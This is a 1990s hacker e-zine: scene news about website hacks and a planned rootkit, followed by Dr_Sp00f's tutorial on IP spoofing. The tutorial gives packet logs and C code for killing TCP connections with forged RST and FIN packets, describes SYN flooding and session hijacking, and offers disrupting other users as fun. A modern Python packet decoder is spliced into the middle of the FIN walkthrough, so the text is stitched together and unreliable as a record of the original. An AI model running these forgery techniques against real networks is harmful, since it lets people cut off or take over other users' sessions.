if your system gets shut down      : -50 points
if you keep both of your systems up : 25 points
if you lose both of your systems   : -25 points

On Sunday midnight, all points are worked out, and the league positions are calculated.

These Rules Are Currently Being Changed : http://www.neonunix.org/corewars/

Suggestions to myself or od|phreak...

So, if you have a team of 6 that you would like to enter in CoreWars, mail corewars@ with your team name, details, system IP and other relevant information...

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Technophoria Want A Piece Of CodeZero Too? : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Technophoria, based at www.technophoria.com, did *NOT* hack our webpage at www.neonunix.org/codezero/ as i dont even have a l/p to neonunix.org, anyway, they uploaded this shiznit to the page, obviously with neonunix's account, which is the only one on the system...

Dont talk shit about Technophoria


-Particle Man

Hmmm, who the fuck is Particle Man?! last time I checked the Technophoria member list it had...

Deprave
BroncBuster
Sludge
Acid Angel
Modify
The Messiah
Banshee

Now, I dont get on well with Modify or The Messiah (who are in like, 3 other groups each) but Deprave is a good friend, Sludge and Acid I have never met and Bronc is cool. I dont know whats goin down wit that shit, but the last thing I need is some punk trying to say that I write shit about Technophoria, seeing I have never written a thing about them, but anyway, if you do visit the Technophoria WWW site, you will see that sIn and Technophoria are working on the same project with the same people, Utopia (mentioned in the last issue by *OD|PHREAK*) I wonder who will take the credit and / or release the actual program, hmm..I talked to The Messiah...

Utopia will be a encryption utility, release by SIN/Technophoria, written by The Messiah and Fucking Hostile. No release date is given.

encryption util? for what purposes?
Encrypting files, clipboard, and an editor, like Puffer.
thru windoze?
Yes.
ahh 16 bit.
With plans for a 32 bit version.
because doesnt pgp do that and alot more?
No, it doesn't.
what kind of encryption are we talking about?
PGP only uses ONE algorithm, IDEA. About 16 different algorithms.
and yours will use?
RC4, RC5, IDEA, Blowfish, DES, SuperIDEA... I'm still looking into that...
isnt that just ripping other peoples shit? blatantly
No. If so then PGP is ripping. Puffer is ripping. The source for almost all algorithms is released. So ppl can evaluate it..
what about RC5 source then?
Have it.
okay... so you have all your algorithms
RSA condones non-commercial use of RC4 and RC5. Pretty much.
but how will the program work then?
Right now I'm wondering which algorithms to put into it.
will it have secret keys and public keys like pgp ?
You select an algorithm, files, and hit encrypt... No, symmetric key encryption. One password...
isnt that a bit unsecure?
I'm making a public key encryption program later on... No, it isn't. seeing then the password will have to be given to the other user over a medium such as IRC You can't transmit keys, true... which can be logged But this isn't for communication as much as file storgae... People can use PGP to transmit keys... so what will the program include? Hmmm... what won't it? I'm hoping to include some steganography in it... It'll be something like Puffer, only WAY better... okzy 1st release will be 16-bit right? Yes... will it have any problems running thru 95 / NT ? Nope. I'm using Win95... will users need .dll files to run it? One. But that'll come included... No VB bullshit... It's made in Delphi, so the runtime library is in the EXE... delphi i code borland c++ Get C++ Builder then... i plan on doing so Like Delphi, but uses C++... okie, l8r cya ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 3. Global kOS News And Questions / Answers : Spidey ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ There have been several rumors circulating about what happened to us since globalkos.org went down. They range from us being busted by feds to stories about purple shrouds and phenobarbital. There have also been rumors about dissention among our ranks and group infighting. Q: What happened to globalkos.org? Did the feds shut it down? Did their ISP shut it down? Did they move their site to keep it hidden? A: Half of us didn't feel like paying for it. We weren't shut down, nor is the site hidden out there somewhere. We're looking into alternatives. Q: Did Acid Angel leave GkOS for Technophoria? A: No. He is working with the guys at Technophoria, but he is still a part of Global kOS. Q: Did Silicon Toad leave the group altogether? A: Somebody came up with this one on the basis of a broken link at globalkos.org. ST moved his site, and no one bothered to update the link. 
Through some stretch of logic this guy decided it meant ST split. Q: What about Up Yours 4? A: It's slated for release on March 30th. Q: Did GkOS get busted? A: No. Q: I thought Cobra (Vortex, Morbid Disorder, Kludge, or Ryan) was a member of GkOS. A: I've never even heard of these people. They are not present, nor former members. Our members are: Acid Angel Glitch Materva Raven Shadow Hunter Silicon Toad Spidey That Guy Zaven Q: I heard there was a major disagreement within the group, and there's a civil war going on between them. Is it true? A: No. This is completely unfounded. Whoever started this one pulled it straight out of his ass. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 4. www.ncaa.com Hack Makes News : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Conflict member TiK hacked www.ncaa.com, he made TV news, papers, and big internet news, statements from the NCAA and other organisations can be found on www.infowar.com, so1o never believed TiK would or could hack such a site due to the high security levels, but good 'ole TiK proved us all wrong, expect the index.html s00n! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 5. CodeZero To Release sunOS 5.x RootKit : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Yeah, werkin' on it, lewkout!! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 6. 
Too Many nethosting.com Break-Ins : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ www.hawkee.com and many other "vservers" at nethosting.com have been hacked or attacked, like sinnerz.com (although no damage was done to the site) and so the admin at nethosting can't be very happy with their security, I was talking to hawkee about the hacks into his system by two members of the CodeZero (thats what the numbers stood for - minus 2 from each, turn the 0 into a 26, then 1 = A, 2 = B, 3 = C etc. = CODEZERO) and he was saying that newhosting had really boosted their secruity, this was also the case when access to cough-syrup.nethosting.com was gained by one single hacker, as after the attack, the sendmail version was pumped from 8.8.4 to 8.8.5, nethosting are also considering taking action to prevent certain hosts from having access to the system. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 7. sulfur of #hack to print a bi-monthly magazine : so1o ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 15 year old = sulfur, wants to print his own mag, like the 2600, but called Access Denied, supposed to have some good writers, issue 1 will be distributed at SummerCon for free! sulfur writes under the name Edward Givings (initials E.G) and looks like an Emmanuel Goldstein wannabe (initials E.G also!@^) but hes 15, oh well, g00d luck t0 h1m... ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .:. The CodeZero In Assosiation With Dr_Sp00f Presents .:. .:. A Confidence Remains High Production .:. 
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
         -=[ A short (yea right - T_K) overview of IP spoofing: PART I ]=-
                    -=[ Part of Dr_sp00f's Packet Project']=-
              (Includes Source for Linux 1.3.X and later kernels)

       All text and Source code written by Dr_Sp00f himself (Copyright 1997)
                    All source tested on Linux kernel 2.0.X
      All packet data captured with Sniffit 0.3.2 (a pre-release at that time)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

PART I: Simple spoofing (Non blind)
-----------------------------------

0. Introduction
   0.1 What
   0.2 For whom
   0.3 Disclaimer
   0.4 Licence
1. Short explanation of some words
2. Description of sourcecode
   2.1 Source included
   2.2 Programmer notes
3. TCP/IP (UDP) in an hazelnutshell
4. Non-blind spoofing
   4.1 Know what you are doing
   4.2 SYN flooding
   4.3 Connection Killing
       4.3.1 Using reset (RST)
       4.3.2 Closing a connection (FIN)
       4.3.3 Improving
   4.4 Connection Hijacking
   4.5 Other
5. The source code

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
PART I: Simple spoofing (Non blind)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

0. Introduction
---------------

0.1 What
--------

This document describes some IP spoofing attacks and gives you example source
code of the programs used for these attacks (and packet sniffer logs, so you
see what exactly happens). It also provides you with an easy to use include
file for experimenting a little yourself.

Oh, if you make something nice with the "spoofit.h" file, please mail it to me
(or a reference where it is available) with a little explanation on what it is
(a few lines are enough)...

If you have interesting remarks, comments, ideas, ... please contact me:
Dr_spoof@geocities.com

If YOU think of yourself, you are "3l33t": >/dev/null or >/dev/echo, depends
on how smart you are.

It is not wise to use what you don't know/understand, so read this before
trying anything... it will only take a few minutes, and probably save you some
hours of failure...

This code is not crippled in the usual way (removing some vital parts); the
power is limited by its briefness, because I wanted to keep everything simple
and illustrative (but working). It's a simple job to improve it, and that is
the goal of this doc, that you improve it yourself.

Special thx to |ExcEEd| and theJUdgE, also to all those ppl who deserve it.

0.2 For whom
------------

For people with an elementary knowledge of TCP/IP, some knowledge of C (only
the basic setup) and some general UNIX knowledge. It's no use reading this
document if you are completely unaware of these things, but mind you, only a
little knowledge is enough.

0.3 Disclaimer
--------------

I am in no way responsible for the use of this code. By using this software
and reading this document you accept the fact that any damage (emotional,
physical, dataloss and the end of the world as we know it ...) caused by the
use or storage of these programs/documents is not MY responsibility.

I state that during the writing and testing of this document/source, I never
violated any law. All spoofing was done between machines where I had legit
root access, or where I had the permission from the legit root.

This code can be written by any competent programmer, so this source is not
so harmful as some will say (cauz' I'm sure some people won't like this degree
of disclosure).

0.4 Licence
-----------

All source code and text is freely available. You can spread it, as long as
you don't charge for it (exceptions are a small reproduction fee, if it isn't
spread together with commercial software, texts.) You may not spread parts of
the document, it should be spread as one package. You may not modify the text
and/or source code.

You can use the spoofit.h or derived code in your own programs as long as
they are not commercial (i.e. FREE), and you give me the credits for it.

1. Short explanation of some words
----------------------------------

This is a short explanation of some words you might see in the text/source.
You probably know all this, but I put it in here anyway.

Sniffit
  My favourite Packet Sniffer; all sniffed sequences in this document were
  captured with it. (At time of writing a pre-release 0.3.2)

IP-spoofing (further referenced to as spoofing)
  The forging of IP packets
  NOTE that not only IP based protocols are spoofed.
  NOTE that spoofing is also used on a constructive base (LAN spoofing, not
       discussed here).
  NOTE that I don't use it on a constructive base ;)

Non-blind spoofing
  Using the spoofing to interfere with a connection that sends packets along
  your subnet (so generally one of the 2 hosts involved is located on your
  subnet, or all data traffic has to be passing your network device,... you
  might consider taking a job at some transatlantic route provider).

Blind spoofing
  Using the spoofing to interfere with a connection (or creating one), that
  does not send packets along your cable.

2. Description of sourcecode
----------------------------

2.1 Source included
-------------------

spoofit.h
  The include file that provides some easy to use spoofing functions. To
  understand the include file and its functions, read the header of that file
  for use of the C functions.

*.c
  Example programs (on the use of spoofit.h) that are discussed in this
  document. Details on these programs are included in the appropriate
  sections.

  sniper-rst.c   Basic TCP connection killer. (denial-of-services)
  sniper-fin.c   Basic TCP connection killer. (denial-of-services)
  hijack.c       Simple automated telnet connection hijacker.

2.2 Programmer notes
--------------------

These programs are just examples. That means, they could be improved a lot.
Because I wanted to keep them short and leave some stuff to your imagination,
they are very simple. However they all work and are a good starting point.

3. TCP/IP (UDP) in an hazelnutshell
-----------------------------------

Because it has been explained enough in 'Phrack Volume Seven, Issue
Forty-Eight, File 14 of 18' by daemon9/route/infinity, and there is a lot of
documentation available on the subject, I will only repeat some things very
briefly. (Please read the phrack #48 file or any other document on the subject
before reading this).

A connection is fully defined with 4 parameters: a source host and port, and
a destination host and port. When you make a connection, data is sent in
packets. Packets take care of low level traffic, and make sure the data
arrives (sometimes with special error handling).

The spine of most networks is the IP protocol version 4. It is totally
independent of all hardware protocols. TCP and UDP are higher level protocols
wrapped up in IP packets. All those packets consist of a header and data.

IP header contains (amongst other things): IP of source and destination hosts
for that packet, and the protocol type of the packet wrapped up in it.
(TCP=6, UDP=17, etc.).

UDP packets contain (amongst other things): port number of source and
destination host. UDP has no such thing as SEQ/ACK, it is a very weak
protocol.

TCP packets contain (amongst other things): port number of source and
destination host, sequence and acknowledge numbers (further referred to as
SEQ/ACK), and a bunch of flags.

SEQ number: is counted byte per byte, and gives you the number of the NEXT
            byte to be sent, or that is sent in this packet.
ACK number: is the SEQ number that is expected from the other host.

SEQ numbers are chosen at connection initiation.

I said it was going to be short... If you didn't understand the above text,
read up on it first, because you won't understand sh!t of the rest.

4. Non-blind spoofing
---------------------

4.1 Know what you are doing
---------------------------

The concept of non-blind spoofing (NBS further in this doc) is pretty simple.
Because packets travel within your reach, you can get the current sequence and
acknowledge (SEQ/ACK further in this doc) numbers on the connection. NBS is
thus a very easy and accurate method of attack, but limited to connections
going over your subnet.

In spoofing documentation these attacks are sometimes omitted, because they
are mostly 'denial-of-service' attacks, or because people don't realise the
advantage a spoof (in particular a hijack) can have above simple password
sniffing.

Spoofing in general is referred to as a very high level of attack. This refers
to blind spoofing (BlS further in this doc), because NBS is kid stuff for a
competent coder.

4.2 SYN flooding
----------------

Thoroughly discussed in 'Phrack Volume Seven, Issue Forty-Eight, File 13 of
18'. I won't waste much time on it.

Setup:
        host A <-----][----------X--------------->host B
                                 |
        host S <-----------------/

Concept:
  Host S impersonates SYN (connection init) coming from host A, to host B.
  Host A should be unreachable (e.g. turned off, non-existent,...). B sends
  out the second packet of the 3 way TCP handshake. Host B will now wait for
  response of host A. If host A is reachable it will tell host B (with a
  reset: RST) that it DID NOT initiate a connection, and thus host B received
  a bogus packet. (In that case host B will ignore the SYN, and *normally*
  nothing will happen)

  So if A is unreachable, B will wait for response some time. When doing
  multiple attacks, the backlog of host B is going to be exceeded and host B
  will not accept new connections (read on TCP bugs for additional features
  ;) for some time.

4.3 Connection Killing
----------------------

Setup:
        host A <------X------------------------->host B   A,B have a TCP
                      |                                    connection running
        host S <------/                                    A,S on same subnet

        (setup is the same in both cases)

Use:
  Clearing mudders of your net, annoying that dude typing an important paper,
  etc... plain fun.
4.3.1 Using reset (RST)
-----------------------

Concept:
  TCP packets have flags which indicate the status of the packet, like RST.
  That is a flag used to reset a connection. To be accepted, only the sequence
  number has to be correct (there is no ACK in a RST packet). So we are going
  to wait for packets in a connection between A and B. Assume we wait for
  packets to A. We will calculate (from B's packets) the sequence number for
  A's packets (from B's ACK's), and fire a bogus RST packet from S (faking to
  be A) to B.

An actual attack:
  (These are real sniffed packets, although IP numbers of hosts were changed)

  host A : 166.66.66.1
  host B : 111.11.11.11
  (S on same subnet as A)

  (This is a good example of how things not always go as you want, see below
  for a solution)

1) connection running... we wait for a packet to get current SEQ/ACK (A->B)

   TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23
     SEQ (hex): 57E1F2A6   ACK (hex): B8BD7679
     FLAGS: -AP---   Window: 3400
   (data removed because irrelevant, 2 bytes data)

2) This is the ACK of it + included data (which causes the SEQ number to
   change, and thus messes up our scheme, because this came very fast.) (B->A)

   TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
     SEQ (hex): B8BD7679   ACK (hex): 57E1F2A8
     FLAGS: -AP---   Window: 2238
   (data removed because irrelevant, 2 bytes data)

3) ACK of it. (A->B)

   TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23
     SEQ (hex): 57E1F2A8   ACK (hex): B8BD767B
     FLAGS: -A----   Window: 3400
   (data removed because irrelevant)

4) further data (B->A)

   TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
     SEQ (hex): B8BD767B   ACK (hex): 57E1F2A8
     FLAGS: -AP---   Window: 2238
   (data removed because irrelevant)

5) ACK of it (A->B)

   TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23
     SEQ (hex): 57E1F2A8   ACK (hex): B8BD7691
     FLAGS: -A----   Window: 3400

6) Now we get 2 RST packets. How do you explain that? Well, the first reset
   packet has been buffered somewhere on our system, because the ethernet
   segment was busy when we wanted to send it. This is the 'unexpected thing'
   I discussed above; here we are lucky, the data stream cooled down so fast.
   When it doesn't cool down so fast, we could miss our RST (or the connection
   will be killed a little later than when we wanted); you'll see some ideas
   on how to fix that problem.

   TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
     SEQ (hex): B8BD7679
     FLAGS: ---R--

   TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
     SEQ (hex): B8BD7691
     FLAGS: ---R--
   (This was the packet that killed the connection)

Discussion of the program:
  The discussion here is a bit weird, that is because 'sniper-rst.c' is not
  designed to be an optimal killer, merely to be an example. We have the
  problem of speed here. We miss some packets, which causes those resends. So
  we would design a better 'sniper' if we do the following:

  - use blocking IO (not necessarily, because the RST killer would lose some
    of its beauty (looping); this is dealt with in the FIN killer example.
    Blocking is a little faster when a lot of packets come after each other.)
  - multi-packet firing... fire more packets with incremented SEQ. (this is
    commented in the source)
  - waiting for a pure ACK packet (no data), because otherwise you risk too
    much of getting mid transmission and not being fast enough. (disadvantage
    is the 'waiting period' before the connection is killed)

  NOTE these examples were done on non-loaded networks, with non-loaded
  servers, which makes it a worst case scenario for speed problems.

4.3.2 Closing a connection (FIN)
--------------------------------

Concept:
  Another flag is FIN and says: "no more data from sender". This flag is used
  when closing a connection down the normal legit way. So if there was a way
  to make a packet that is accepted by one of the two hosts, this host would
  believe the 'sender' didn't have any data left. Following (real) packets
  would be ignored as they are considered bogus.

  That's it, because we can sniff the current SEQ/ACK of the connection we can
  pretend to be either host A or B, and provide the other host with CORRECT
  packet information, and an evil FIN flag.

  The beauty of it all is, that after a FIN is sent the other host always
  replies with one if it is accepted, so we have a way to verify our killing,
  and can be 100% sure of success (if for some reason we missed a SEQ or ACK,
  we can just resend).

  RST killing is more popular and is preferred, but I've put this in as an
  example, and I like it myself.

An actual attack:
  (These are real sniffed packets, although IP numbers of hosts were changed)

  host A : 166.66.66.1
  host B : 111.11.11.11
  (S on same subnet as A)

1) connection is running.... sniper is started on host S as
   'sniper-fin 166.66.66.1 23 111.11.11.11 1072' and waits for a packet to
   take action (we need to get SEQ/ACK) (mind you switching host A and B
   would be the same, only S would be impersonating A instead of B)

   suddenly a packet arrives... (A->B)

   TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
     SEQ (hex): 19C6B98B   ACK (hex): 69C5473E
     FLAGS: -AP---   Window: 3400

   Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
     45 E  00 .  00 .  2A *  30 0  5E ^  40 @  00 .  40 @  06 .
     5E ^  AD .  9D .  C1 .  45 E  33 3  9D .  C1 .  2B +  0D .
     00 .  17 .  04 .  30 0  19 .  C6 .  B9 .  8B .  69 i  C5 .
     47 G  3E >  50 P  18 .  34 4  00 .  3A :  61 a  00 .  00 .
     0D .  0A .
     ~~~~~~~~~~~ > 2 data bytes

2) sniper detected it, and sends a bogus packet. (S as B -> A)

   We calculate our SEQ as: ACK of (A->B) packet
   We calculate our ACK as: SEQ of (A->B) packet + datalength of that packet
                            (19C6B98B + 2 = 19C6B98D)
   (so we tell A, we received the last packet, and will not transmit further
   data)

   TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.1072-166.66.66.1.23
     SEQ (hex): 69C5473E   ACK (hex): 19C6B98D
     FLAGS: -A---F   Window: 7C00
   (data removed because irrelevant)

3) host A now says: 'okay, you end the session, so here is my last data'
   (A->B)

   TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
     SEQ (hex): 19C6B98D   ACK (hex): 69C5473E
     FLAGS: -AP---   Window: 3400
   (data removed because irrelevant)

   TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
     SEQ (hex): 19C6B998   ACK (hex): 69C5473F
     FLAGS: -A----   Window: 3400
   (data removed because irrelevant)

4) host A now has flushed its buffer and on his turn FIN's the connection.
   (A->B) sniper intercepts this packet and now knows the host fell for the
   spoof and the killing was a success! (host A will no longer accept any
   data)

   TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
     SEQ (hex): 19C6B998   ACK (hex): 69C5473F
     FLAGS: -A---F   Window: 3400
   (data removed because irrelevant)

5) We impersonated B, making A believe we had no further data. But B doesn't
   know that and continues to send packets. (B->A) Host A has that connection
   closed, and thus thinks the real packets of B are spoofed (or at least
   bogus)! So host A sends some reset packets (RST).

   TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.1072-166.66.66.1.23
     SEQ (hex): 69C5473E   ACK (hex): 19C6B98D
     FLAGS: -A----   Window: 3750
   (data removed because irrelevant)

   TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
     SEQ (hex): 19C6B98D
     FLAGS: ---R--
   (data removed because irrelevant)

6) This goes on for a couple of packets.
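Reading the raw dump in step 1 of the FIN example by hand is tedious, so here is a decoder for it. This Python is an added example, not part of Dr_Sp00f's document or of spoofit.h: it takes the 42 bytes from the sniffit dump, recovers the fields the summary line shows (ports 23 and 1072, SEQ 19C6B98B, ACK 69C5473E, flags -AP---, window 3400, the two data bytes) and verifies both the IP header checksum and the TCP checksum, the first thing a defender does when deciding whether a captured segment is well-formed. The field layout and the RFC 1071 checksum are standard; the sniffit flag order "UAPRSF" is taken from the flag strings printed above. One thing the decode also shows: the address bytes in the dump were never rewritten, so they decode to the original hosts rather than the 166.66.66.1 / 111.11.11.11 substitutes used in the summary lines.

```python
"""Decode and checksum-verify the raw IPv4/TCP frame from step 1 of the FIN
example (the 42-byte sniffit dump). Added example; not part of the original
document or of spoofit.h."""
import struct
from dataclasses import dataclass

# The byte column of the sniffit dump, exactly as printed (ASCII column dropped).
CAPTURED = bytes.fromhex(
    "45 00 00 2A 30 5E 40 00 40 06 5E AD 9D C1 45 33 9D C1 2B 0D "  # IP header
    "00 17 04 30 19 C6 B9 8B 69 C5 47 3E 50 18 34 00 3A 61 00 00 "  # TCP header
    "0D 0A"                                                         # 2 data bytes
)

FLAG_ORDER = "UAPRSF"  # order of sniffit's flag column, e.g. "-AP---" = ACK+PSH
FLAG_BITS = {"U": 0x20, "A": 0x10, "P": 0x08, "R": 0x04, "S": 0x02, "F": 0x01}


def internet_checksum(data: bytes) -> int:
    """RFC 1071: one's-complement sum of 16-bit words with carries folded in.
    Run over a header that already contains its checksum field it yields 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


@dataclass
class Decoded:
    src: str
    dst: str
    sport: int
    dport: int
    seq: int
    ack: int
    flags: str          # sniffit-style flag string
    window: int
    payload: bytes
    ip_checksum_ok: bool
    tcp_checksum_ok: bool


def dotted(addr: bytes) -> str:
    return ".".join(str(b) for b in addr)


def decode(frame: bytes) -> Decoded:
    """Parse one IPv4 frame carrying TCP and verify both checksums."""
    (ver_ihl, _tos, total_len, _ident, _frag, _ttl,
     proto, _ip_sum, src, dst) = struct.unpack("!BBHHHBBH4s4s", frame[:20])
    if ver_ihl >> 4 != 4 or proto != 6:
        raise ValueError("not an IPv4 frame carrying TCP (protocol 6)")
    ihl = (ver_ihl & 0x0F) * 4
    ip_ok = internet_checksum(frame[:ihl]) == 0

    tcp = frame[ihl:total_len]
    (sport, dport, seq, ack, off_res, flag_bits,
     window, _tcp_sum, _urg) = struct.unpack("!HHIIBBHHH", tcp[:20])
    data_off = (off_res >> 4) * 4
    # The TCP checksum also covers a pseudo-header: src, dst, zero, protocol, TCP length.
    pseudo = struct.pack("!4s4sBBH", src, dst, 0, proto, len(tcp))
    tcp_ok = internet_checksum(pseudo + tcp) == 0
    flags = "".join(f if flag_bits & FLAG_BITS[f] else "-" for f in FLAG_ORDER)
    return Decoded(dotted(src), dotted(dst), sport, dport, seq, ack, flags,
                   window, tcp[data_off:], ip_ok, tcp_ok)


if __name__ == "__main__":
    d = decode(CAPTURED)
    print(f"{d.src}.{d.sport} -> {d.dst}.{d.dport}  SEQ {d.seq:08X} ACK {d.ack:08X}"
          f"  FLAGS {d.flags}  Window {d.window:X}  data {d.payload!r}")
    print("IP checksum ok:", d.ip_checksum_ok, " TCP checksum ok:", d.tcp_checksum_ok)
```

Flipping any single byte of the segment makes the TCP checksum fail, which is why a forged packet has to recompute it over the pseudo-header as well as the TCP header and data; a monitor that sees a segment with a bad checksum should treat it as damaged rather than act on its flags.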
Discussion of the program (numbers correspond with those of 'An Actual
Attack'):

1) stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,10);
   if(stat==-1)
     {printf("Connection 10 secs idle... timeout.\n");exit(1);}

   We use wait_packet on a non blocking socket. This way we can enable a 10
   seconds timeout. This function returns when the correct packet has been
   delivered (or timeout).

2) sp_seq=pinfo.ack;
   sp_ack=pinfo.seq+pinfo.datalen;
   transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P,
                 sp_seq,sp_ack,ACK|FIN);

   We calculate a spoofed SEQ/ACK, and fire off a fake FIN packet. As we
   don't send any data with it, our buffer is set to NULL and datalength to
   0. NOTE together with FIN, you need to enable ACK.

3) N/A

4) stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,FIN,5);
   if(stat>=0)
     {printf("Killed the connection...\n"); exit(0);}

   We wait for a FIN packet (note the FIN in wait_packet). We use a 5 sec.
   timeout; if the function returns and stat>=0 (-1 on timeout), we know our
   attempt was successful.

5) N/A

6) N/A

NOTE We can have the same problem here as with the RST killer. But we didn't
     have it here, because the packet we responded upon was the end of a data
     stream (in fact it was an echo from a shell command)

4.3.3 Improving
---------------

Apart from multi-packet firing, it is advised to launch 2 attacks (one in each
direction). This allows one-way oriented connections to be handled optimally.
I think of things like downloading data, which is a one way data-flow: it is
much easier sending a RST from the (spoofed) receiver to the sender, than the
